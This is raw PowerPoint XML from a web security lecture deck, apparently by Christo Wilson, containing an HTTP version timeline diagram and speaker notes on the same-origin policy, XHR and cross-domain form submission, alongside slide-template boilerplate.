    <dsp:sp modelId="{FD9B2A4B-0A15-4C6D-8F09-2E3A9FAC16C3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8839200" y="331851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0" numCol="1" spcCol="1270" anchor="t" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>HTTP 3</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8839200" y="3318510"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A1D9E0A4-E264-48F0-BFDD-B9B6FC53C494}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10312399" y="2807969"/>
          <a:ext cx="0" cy="408432"/>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A2975E1-3363-4AF5-BE51-9FE82BE2B954}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10261346" y="3216402"/>
          <a:ext cx="102108" cy="1021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93FF2-D5FB-40E6-95CF-E5C3D654F3A9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="1217929" y="1668780"/>
          <a:ext cx="510540" cy="1767840"/>
        </a:xfrm>
        <a:prstGeom prst="round2Same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1991</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="5400000">
        <a:off x="614203" y="2322353"/>
        <a:ext cx="1742917" cy="460694"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{47C3AB37-9C52-4749-B530-0C50D80BC6F0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="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213360" numCol="1" spcCol="1270" anchor="b" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>HTTP 0.9</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BC912698-20C3-46C9-91CC-B8952EE0BD18}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1473199" y="1888998"/>
          <a:ext cx="0" cy="408432"/>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F681138-387A-4C28-8B52-443560771A07}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1422145" y="1786890"/>
          <a:ext cx="102108" cy="1021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1EA8D1-178B-416A-B0DD-97987602BF60}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2357119" y="2297429"/>
          <a:ext cx="1767840" cy="51054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1995</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2357119" y="2297429"/>
        <a:ext cx="1767840" cy="510540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{160C516D-BF93-417D-B6CC-BE4F8A22E8FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1767839" y="331851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0" numCol="1" spcCol="1270" anchor="t" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>SSL</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1767839" y="3318510"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2C32AB0A-B872-4B54-AB35-ED916279DD2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3241039" y="2807969"/>
          <a:ext cx="0" cy="408432"/>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573812A-97EF-4588-A3B1-0873349993A8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3189985" y="3216402"/>
          <a:ext cx="102108" cy="1021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593EFD-16AD-409F-A6A3-937D7A8ABA02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4124959" y="2297430"/>
          <a:ext cx="1767840" cy="51054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1996</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4124959" y="2297430"/>
        <a:ext cx="1767840" cy="510540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E532C61B-EF81-474F-B04E-1AA02E24B7D2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3535679" y="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213360" numCol="1" spcCol="1270" anchor="b" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>HTTP 1.0</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3535679" y="0"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D3BE0A94-0A8A-456A-B10C-8B69CA2B8DFF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5008879" y="1888998"/>
          <a:ext cx="0" cy="408432"/>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10D6179-C436-4999-87D9-7ADF18631E52}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4957826" y="1786890"/>
          <a:ext cx="102108" cy="1021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6110A3-E0D0-43B3-92B3-A4A5E84D4558}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5892800" y="2297429"/>
          <a:ext cx="1767840" cy="51054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1997</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5892800" y="2297429"/>
        <a:ext cx="1767840" cy="510540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C260E6D6-FF44-4199-BD8D-9ACC1EA04FB4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5303519" y="331851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0" numCol="1" spcCol="1270" anchor="t" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>HTTP 1.1</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5303519" y="3318510"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16BA37F9-AC83-41A1-A225-BBEBE30F8506}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6776719" y="2807969"/>
          <a:ext cx="0" cy="408432"/>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86E322-F3BB-40E4-839E-62056634B463}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6725666" y="3216402"/>
          <a:ext cx="102108" cy="1021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3FF55-EC45-4135-9783-2A688437DFFE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7660640" y="2297430"/>
          <a:ext cx="1767840" cy="51054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2015</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7660640" y="2297430"/>
        <a:ext cx="1767840" cy="510540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DA846994-6090-4F97-9118-4EBEE2B30F8C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7071360" y="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213360" numCol="1" spcCol="1270" anchor="b" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>HTTP 2</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7071360" y="0"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{80F31A04-C3F1-44A5-A746-95697069E664}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8544559" y="1888998"/>
          <a:ext cx="0" cy="408432"/>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FEA2BC7-A331-4216-89BD-89A50FEA012E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8493506" y="1786890"/>
          <a:ext cx="102108" cy="1021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C5326-2DFE-4E0D-82D0-779AF7799A08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="10057130" y="1668779"/>
          <a:ext cx="510540" cy="1767840"/>
        </a:xfrm>
        <a:prstGeom prst="round2Same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a:t>2022</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="9428481" y="2322352"/>
        <a:ext cx="1742917" cy="460694"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FD9B2A4B-0A15-4C6D-8F09-2E3A9FAC16C3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8839200" y="3318510"/>
          <a:ext cx="2946400" cy="178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0" numCol="1" spcCol="1270" anchor="t" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200"/>
            <a:t>HTTP 3</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8839200" y="3318510"/>
        <a:ext cx="2946400" cy="1786890"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A1D9E0A4-E264-48F0-BFDD-B9B6FC53C494}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10312399" y="2807969"/>
          <a:ext cx="0" cy="408432"/>
        </a:xfrm>
        <a:prstGeom prst="line">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
        <a:ln w="100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A2975E1-3363-4AF5-BE51-9FE82BE2B954}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10261346" y="3216402"/>
          <a:ext cx="102108" cy="1021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a:t>Christo Wilson</a:t>
            </a:r>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r>
              <a:rPr lang="en-US"/>
              <a:t>8/22/2012</a:t>
            </a:r>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r>
              <a:rPr lang="en-US"/>
              <a:t>Defense</a:t>
            </a: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3CF3CE8-99B9-4E0D-8156-BD8D62DE6A20}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428249905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a:t>Christo Wilson</a:t>
            </a:r>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r>
              <a:rPr lang="en-US"/>
              <a:t>8/22/2012</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="696913"/>
            <a:ext cx="61976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r>
              <a:rPr lang="en-US"/>
              <a:t>Defense</a:t>
            </a:r>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7FBF96E-C445-4FF1-86A3-96F5585B6DBD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243219080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etsparker.com/whitepaper-same-origin-policy/"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FBF96E-C445-4FF1-86A3-96F5585B6DBD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8/22/2012</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Header Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Christo Wilson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262060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Introduced by Netscape engineers in 1995 along with the Document Object Model (DOM) and the ability of JS to query it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nice WP on SOP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.netsparker.com/whitepaper-same-origin-policy/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Christo Wilson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8/22/2012</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77FBF96E-C445-4FF1-86A3-96F5585B6DBD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2403842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prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Shape 410"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>XHR introduced by Microsoft in IE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31989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Forms are not covered by SOP.  Can submit forms from a domain that is NOT the source domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This is so broken!  WHY is it allowed?  Don't know. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C0292AC4-46E6-48DF-9C15-A91B135037C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297715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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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780524" y="236539"/>
            <a:ext cx="78232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128000" y="6248401"/>
            <a:ext cx="3556000" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812801" y="6248207"/>
            <a:ext cx="722811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83B9EA5-CE9A-4950-A80C-5ADF06B45B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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609602" y="6248208"/>
            <a:ext cx="7431311" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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4500"/>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl2pPr marL="625056" indent="-312528"/>
            <a:lvl3pPr marL="937584" indent="-312528"/>
            <a:lvl4pPr marL="1250112" indent="-312528"/>
            <a:lvl5pPr marL="1562640" indent="-312528"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Body Level Five</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409304742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1785600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1256270"/>
            <a:ext cx="711200" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
